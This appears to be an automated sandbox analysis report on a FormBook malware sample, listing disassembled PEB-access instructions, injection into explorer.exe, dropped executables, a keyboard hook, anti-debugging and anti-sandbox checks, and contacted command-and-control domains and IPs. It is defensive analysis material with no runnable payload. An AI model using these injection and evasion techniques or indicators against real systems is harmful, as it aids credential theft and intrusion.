Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D03E2 mov eax, dword ptr fs:[00000030h] 29_2_1E3D03E2
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E475BA5 mov eax, dword ptr fs:[00000030h] 29_2_1E475BA5
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D002D mov eax, dword ptr fs:[00000030h] 29_2_1E3D002D
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D002D mov eax, dword ptr fs:[00000030h] 29_2_1E3D002D
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D002D mov eax, dword ptr fs:[00000030h] 29_2_1E3D002D
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D002D mov eax, dword ptr fs:[00000030h] 29_2_1E3D002D
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D002D mov eax, dword ptr fs:[00000030h] 29_2_1E3D002D
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3BB02A mov eax, dword ptr fs:[00000030h] 29_2_1E3BB02A
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3BB02A mov eax, dword ptr fs:[00000030h] 29_2_1E3BB02A
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3BB02A mov eax, dword ptr fs:[00000030h] 29_2_1E3BB02A
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3BB02A mov eax, dword ptr fs:[00000030h] 29_2_1E3BB02A
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3DBC2C mov eax, dword ptr fs:[00000030h] 29_2_1E3DBC2C
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E43C450 mov eax, dword ptr fs:[00000030h] 29_2_1E43C450
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E43C450 mov eax, dword ptr fs:[00000030h] 29_2_1E43C450
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E471074 mov eax, dword ptr fs:[00000030h] 29_2_1E471074
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E462073 mov eax, dword ptr fs:[00000030h] 29_2_1E462073
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E461C06 mov eax, dword ptr fs:[00000030h] 29_2_1E461C06
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E461C06 mov eax, dword ptr fs:[00000030h] 29_2_1E461C06
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E461C06 mov eax, dword ptr fs:[00000030h] 29_2_1E461C06
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E461C06 mov eax, dword ptr fs:[00000030h] 29_2_1E461C06
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E461C06 mov eax, dword ptr fs:[00000030h] 29_2_1E461C06
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E461C06 mov eax, dword ptr fs:[00000030h] 29_2_1E461C06
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E461C06 mov eax, dword ptr fs:[00000030h] 29_2_1E461C06
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E461C06 mov eax, dword ptr fs:[00000030h] 29_2_1E461C06
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E461C06 mov eax, dword ptr fs:[00000030h] 29_2_1E461C06
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E461C06 mov eax, dword ptr fs:[00000030h] 29_2_1E461C06
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E461C06 mov eax, dword ptr fs:[00000030h] 29_2_1E461C06
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E461C06 mov eax, dword ptr fs:[00000030h] 29_2_1E461C06
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E461C06 mov eax, dword ptr fs:[00000030h] 29_2_1E461C06
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E461C06 mov eax, dword ptr fs:[00000030h] 29_2_1E461C06
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E426C0A mov eax, dword ptr fs:[00000030h] 29_2_1E426C0A
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E426C0A mov eax, dword ptr fs:[00000030h] 29_2_1E426C0A
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E426C0A mov eax, dword ptr fs:[00000030h] 29_2_1E426C0A
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E426C0A mov eax, dword ptr fs:[00000030h] 29_2_1E426C0A
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E47740D mov eax, dword ptr fs:[00000030h] 29_2_1E47740D
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E47740D mov eax, dword ptr fs:[00000030h] 29_2_1E47740D
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E47740D mov eax, dword ptr fs:[00000030h] 29_2_1E47740D
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3C746D mov eax, dword ptr fs:[00000030h] 29_2_1E3C746D
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E474015 mov eax, dword ptr fs:[00000030h] 29_2_1E474015
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E474015 mov eax, dword ptr fs:[00000030h] 29_2_1E474015
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E427016 mov eax, dword ptr fs:[00000030h] 29_2_1E427016
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E427016 mov eax, dword ptr fs:[00000030h] 29_2_1E427016
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E427016 mov eax, dword ptr fs:[00000030h] 29_2_1E427016
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3C0050 mov eax, dword ptr fs:[00000030h] 29_2_1E3C0050
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3C0050 mov eax, dword ptr fs:[00000030h] 29_2_1E3C0050
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3DA44B mov eax, dword ptr fs:[00000030h] 29_2_1E3DA44B
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3DF0BF mov ecx, dword ptr fs:[00000030h] 29_2_1E3DF0BF
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3DF0BF mov eax, dword ptr fs:[00000030h] 29_2_1E3DF0BF
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3DF0BF mov eax, dword ptr fs:[00000030h] 29_2_1E3DF0BF
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E478CD6 mov eax, dword ptr fs:[00000030h] 29_2_1E478CD6
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E90AF mov eax, dword ptr fs:[00000030h] 29_2_1E3E90AF
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E43B8D0 mov eax, dword ptr fs:[00000030h] 29_2_1E43B8D0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E43B8D0 mov ecx, dword ptr fs:[00000030h] 29_2_1E43B8D0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E43B8D0 mov eax, dword ptr fs:[00000030h] 29_2_1E43B8D0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E43B8D0 mov eax, dword ptr fs:[00000030h] 29_2_1E43B8D0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E43B8D0 mov eax, dword ptr fs:[00000030h] 29_2_1E43B8D0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E43B8D0 mov eax, dword ptr fs:[00000030h] 29_2_1E43B8D0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D20A0 mov eax, dword ptr fs:[00000030h] 29_2_1E3D20A0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D20A0 mov eax, dword ptr fs:[00000030h] 29_2_1E3D20A0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D20A0 mov eax, dword ptr fs:[00000030h] 29_2_1E3D20A0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D20A0 mov eax, dword ptr fs:[00000030h] 29_2_1E3D20A0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D20A0 mov eax, dword ptr fs:[00000030h] 29_2_1E3D20A0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D20A0 mov eax, dword ptr fs:[00000030h] 29_2_1E3D20A0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3B849B mov eax, dword ptr fs:[00000030h] 29_2_1E3B849B
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E426CF0 mov eax, dword ptr fs:[00000030h] 29_2_1E426CF0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E426CF0 mov eax, dword ptr fs:[00000030h] 29_2_1E426CF0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E426CF0 mov eax, dword ptr fs:[00000030h] 29_2_1E426CF0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3A9080 mov eax, dword ptr fs:[00000030h] 29_2_1E3A9080
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E4614FB mov eax, dword ptr fs:[00000030h] 29_2_1E4614FB
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E423884 mov eax, dword ptr fs:[00000030h] 29_2_1E423884
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E423884 mov eax, dword ptr fs:[00000030h] 29_2_1E423884
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3A58EC mov eax, dword ptr fs:[00000030h] 29_2_1E3A58EC
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E423540 mov eax, dword ptr fs:[00000030h] 29_2_1E423540
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D4D3B mov eax, dword ptr fs:[00000030h] 29_2_1E3D4D3B
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D4D3B mov eax, dword ptr fs:[00000030h] 29_2_1E3D4D3B
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D4D3B mov eax, dword ptr fs:[00000030h] 29_2_1E3D4D3B
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D513A mov eax, dword ptr fs:[00000030h] 29_2_1E3D513A
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D513A mov eax, dword ptr fs:[00000030h] 29_2_1E3D513A
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3AAD30 mov eax, dword ptr fs:[00000030h] 29_2_1E3AAD30
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3B3D34 mov eax, dword ptr fs:[00000030h] 29_2_1E3B3D34
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3B3D34 mov eax, dword ptr fs:[00000030h] 29_2_1E3B3D34
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3B3D34 mov eax, dword ptr fs:[00000030h] 29_2_1E3B3D34
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3B3D34 mov eax, dword ptr fs:[00000030h] 29_2_1E3B3D34
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3B3D34 mov eax, dword ptr fs:[00000030h] 29_2_1E3B3D34
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3B3D34 mov eax, dword ptr fs:[00000030h] 29_2_1E3B3D34
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3B3D34 mov eax, dword ptr fs:[00000030h] 29_2_1E3B3D34
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3B3D34 mov eax, dword ptr fs:[00000030h] 29_2_1E3B3D34
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3B3D34 mov eax, dword ptr fs:[00000030h] 29_2_1E3B3D34
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3B3D34 mov eax, dword ptr fs:[00000030h] 29_2_1E3B3D34
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3B3D34 mov eax, dword ptr fs:[00000030h] 29_2_1E3B3D34
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3B3D34 mov eax, dword ptr fs:[00000030h] 29_2_1E3B3D34
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3B3D34 mov eax, dword ptr fs:[00000030h] 29_2_1E3B3D34
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3C4120 mov eax, dword ptr fs:[00000030h] 29_2_1E3C4120
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3C4120 mov eax, dword ptr fs:[00000030h] 29_2_1E3C4120
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3C4120 mov eax, dword ptr fs:[00000030h] 29_2_1E3C4120
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3C4120 mov eax, dword ptr fs:[00000030h] 29_2_1E3C4120
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3C4120 mov ecx, dword ptr fs:[00000030h] 29_2_1E3C4120
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3A9100 mov eax, dword ptr fs:[00000030h] 29_2_1E3A9100
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3A9100 mov eax, dword ptr fs:[00000030h] 29_2_1E3A9100
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3A9100 mov eax, dword ptr fs:[00000030h] 29_2_1E3A9100
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3AB171 mov eax, dword ptr fs:[00000030h] 29_2_1E3AB171
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3AB171 mov eax, dword ptr fs:[00000030h] 29_2_1E3AB171
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3CC577 mov eax, dword ptr fs:[00000030h] 29_2_1E3CC577
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3CC577 mov eax, dword ptr fs:[00000030h] 29_2_1E3CC577
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3AC962 mov eax, dword ptr fs:[00000030h] 29_2_1E3AC962
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3C7D50 mov eax, dword ptr fs:[00000030h] 29_2_1E3C7D50
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E478D34 mov eax, dword ptr fs:[00000030h] 29_2_1E478D34
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E42A537 mov eax, dword ptr fs:[00000030h] 29_2_1E42A537
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3CB944 mov eax, dword ptr fs:[00000030h] 29_2_1E3CB944
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3CB944 mov eax, dword ptr fs:[00000030h] 29_2_1E3CB944
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E3D43 mov eax, dword ptr fs:[00000030h] 29_2_1E3E3D43
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D1DB5 mov eax, dword ptr fs:[00000030h] 29_2_1E3D1DB5
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D1DB5 mov eax, dword ptr fs:[00000030h] 29_2_1E3D1DB5
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D1DB5 mov eax, dword ptr fs:[00000030h] 29_2_1E3D1DB5
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E426DC9 mov eax, dword ptr fs:[00000030h] 29_2_1E426DC9
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E426DC9 mov eax, dword ptr fs:[00000030h] 29_2_1E426DC9
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E426DC9 mov eax, dword ptr fs:[00000030h] 29_2_1E426DC9
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E426DC9 mov ecx, dword ptr fs:[00000030h] 29_2_1E426DC9
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E426DC9 mov eax, dword ptr fs:[00000030h] 29_2_1E426DC9
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E426DC9 mov eax, dword ptr fs:[00000030h] 29_2_1E426DC9
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D35A1 mov eax, dword ptr fs:[00000030h] 29_2_1E3D35A1
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D61A0 mov eax, dword ptr fs:[00000030h] 29_2_1E3D61A0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D61A0 mov eax, dword ptr fs:[00000030h] 29_2_1E3D61A0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E46FDE2 mov eax, dword ptr fs:[00000030h] 29_2_1E46FDE2
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E46FDE2 mov eax, dword ptr fs:[00000030h] 29_2_1E46FDE2
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E46FDE2 mov eax, dword ptr fs:[00000030h] 29_2_1E46FDE2
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E46FDE2 mov eax, dword ptr fs:[00000030h] 29_2_1E46FDE2
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3DFD9B mov eax, dword ptr fs:[00000030h] 29_2_1E3DFD9B
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3DFD9B mov eax, dword ptr fs:[00000030h] 29_2_1E3DFD9B
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E4341E8 mov eax, dword ptr fs:[00000030h] 29_2_1E4341E8
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D2990 mov eax, dword ptr fs:[00000030h] 29_2_1E3D2990
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3A2D8A mov eax, dword ptr fs:[00000030h] 29_2_1E3A2D8A
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3A2D8A mov eax, dword ptr fs:[00000030h] 29_2_1E3A2D8A
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3A2D8A mov eax, dword ptr fs:[00000030h] 29_2_1E3A2D8A
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3A2D8A mov eax, dword ptr fs:[00000030h] 29_2_1E3A2D8A
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3A2D8A mov eax, dword ptr fs:[00000030h] 29_2_1E3A2D8A
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E458DF1 mov eax, dword ptr fs:[00000030h] 29_2_1E458DF1
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3DA185 mov eax, dword ptr fs:[00000030h] 29_2_1E3DA185
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D2581 mov eax, dword ptr fs:[00000030h] 29_2_1E3D2581
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D2581 mov eax, dword ptr fs:[00000030h] 29_2_1E3D2581
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D2581 mov eax, dword ptr fs:[00000030h] 29_2_1E3D2581
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D2581 mov eax, dword ptr fs:[00000030h] 29_2_1E3D2581
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3CC182 mov eax, dword ptr fs:[00000030h] 29_2_1E3CC182
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3AB1E1 mov eax, dword ptr fs:[00000030h] 29_2_1E3AB1E1
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3AB1E1 mov eax, dword ptr fs:[00000030h] 29_2_1E3AB1E1
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3AB1E1 mov eax, dword ptr fs:[00000030h] 29_2_1E3AB1E1
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3BD5E0 mov eax, dword ptr fs:[00000030h] 29_2_1E3BD5E0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3BD5E0 mov eax, dword ptr fs:[00000030h] 29_2_1E3BD5E0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E4269A6 mov eax, dword ptr fs:[00000030h] 29_2_1E4269A6
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E4705AC mov eax, dword ptr fs:[00000030h] 29_2_1E4705AC
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E4705AC mov eax, dword ptr fs:[00000030h] 29_2_1E4705AC
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E4251BE mov eax, dword ptr fs:[00000030h] 29_2_1E4251BE
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_0056906B mov eax, dword ptr fs:[00000030h] 29_2_0056906B
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_00564415 mov eax, dword ptr fs:[00000030h] 29_2_00564415
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_00564413 mov eax, dword ptr fs:[00000030h] 29_2_00564413
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_005690F7 mov eax, dword ptr fs:[00000030h] 29_2_005690F7
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_00566C83 mov eax, dword ptr fs:[00000030h] 29_2_00566C83
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_005690B7 mov eax, dword ptr fs:[00000030h] 29_2_005690B7
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_005690AB mov eax, dword ptr fs:[00000030h] 29_2_005690AB
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_00569137 mov eax, dword ptr fs:[00000030h] 29_2_00569137
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_00567EE5 mov eax, dword ptr fs:[00000030h] 29_2_00567EE5
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_00567F4B mov eax, dword ptr fs:[00000030h] 29_2_00567F4B
Enables debug privileges
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System\explorer.exe Domain query: vccmd01.googlecode.com
Source: C:\Windows\System\explorer.exe Domain query: vccmd02.googlecode.com
Source: C:\Windows\System\explorer.exe Network Connect: 74.125.143.82 80
Source: C:\Windows\System\explorer.exe Domain query: vccmd01.zxq.net
Source: C:\Windows\System\explorer.exe Domain query: vccmd03.googlecode.com
Source: C:\Windows\System\explorer.exe Domain query: vccmd01.t35.com
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Section loaded: unknown target: C:\Windows\System\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Thread register set: target process: 3472
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Process created: C:\Users\user\Desktop\os9tzxfmtz.exe c:\users\user\desktop\os9tzxfmtz.exe
Source: C:\Windows\System\explorer.exe Process created: unknown unknown
Source: os9tzxfmtz.exe , 0000001D.00000002.353878128.000000001E6B0000.00000040.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: os9tzxfmtz.exe , 0000001D.00000002.353878128.000000001E6B0000.00000040.00000001.sdmp Binary or memory string: Microsoft-Reserved-24C26ACC-DE62-4303-88AD-6CD4F1447F18SecurityConfigureWindowsPasswordsProxy DesktopProgmanSoftware\Microsoft\Windows NT\CurrentVersion\WinlogonShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells\AvailableShells
Source: explorer.exe, 00000004.00000002.367234221.0000000000783000.00000004.00000020.sdmp Binary or memory string: Program ManagerW64\at.exexe

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe Code function: 0_2_0041E9D0 __vbaChkstk,__vbaOnError,#525,__vbaStrMove,__vbaLenBstr,__vbaStrToAnsi,GetUserNameA,__vbaStrToUnicode,__vbaFreeStr,#537,__vbaStrMove,__vbaInStr,#616,__vbaStrMove,__vbaFreeStr,__vbaFreeStr,__vbaErrorOverflow, 0_2_0041E9D0

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 0000001D.00000002.353190007.000000001E150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.347654001.0000000000060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.368572720.0000000003740000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 0000001D.00000002.353190007.000000001E150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.347654001.0000000000060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.368572720.0000000003740000.00000040.00000001.sdmp, type: MEMORY

Behavior Graph

Behavior Graph ID: 385246  Sample: os9TZxfmTZ.exe  Startdate: 12/04/2021  Architecture: WINDOWS  Score: 100

Textual rendering of the behavior graph image (node numbers as in the report; each node lists its DNS/IP contacts, dropped files, matched signatures and started processes):

Start (2)
  DNS/IP: www.slymwhite.com; www.postphenomenon.com
  Signatures: Potential malicious icon found; Found malware configuration; Malicious sample detected (through community Yara rule); 14 other signatures
  Started: os9TZxfmTZ.exe (12); explorer.exe (16); svchost.exe (18); 3 other processes (21)

os9TZxfmTZ.exe (12)
  Dropped: C:\Users\user\Desktop\os9tzxfmtz.exe, PE32; C:\Users\user\AppData\Local\icsys.icn.exe, PE32
  Signatures: Installs a global keyboard hook
  Started: icsys.icn.exe (23); os9tzxfmtz.exe (27)

svchost.exe (18)
  DNS/IP: 127.0.0.1 unknown unknown

icsys.icn.exe (23)
  Dropped: C:\Windows\System\explorer.exe, PE32
  Signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file; Drops executables to the windows directory (C:\Windows) and starts them; 2 other signatures
  Started: explorer.exe (29)

os9tzxfmtz.exe (27)
  Signatures: Tries to detect Any.run; Hides threads from debuggers
  Started: os9tzxfmtz.exe (34)

explorer.exe (29)
  DNS/IP: vccmd03.googlecode.com; vccmd02.googlecode.com; 5 other IPs or domains
  Dropped: C:\Windows\System\spoolsv.exe, PE32; C:\Users\user\AppData\Roaming\mrsys.exe, PE32
  Signatures: Antivirus detection for dropped file; System process connects to network (likely due to code injection or exploit); Creates an undocumented autostart registry key; 3 other signatures
  Started: spoolsv.exe (36)

os9tzxfmtz.exe (34)
  DNS/IP: demo.sdssoftltd.co.uk 103.67.236.191, port 443, source port 49722, OASISGSSERVICES-ASOASISGSSERVICESIN, India
  Signatures: Modifies the context of a thread in another process (thread injection); Tries to detect Any.run; Maps a DLL or memory area into another process; Hides threads from debuggers

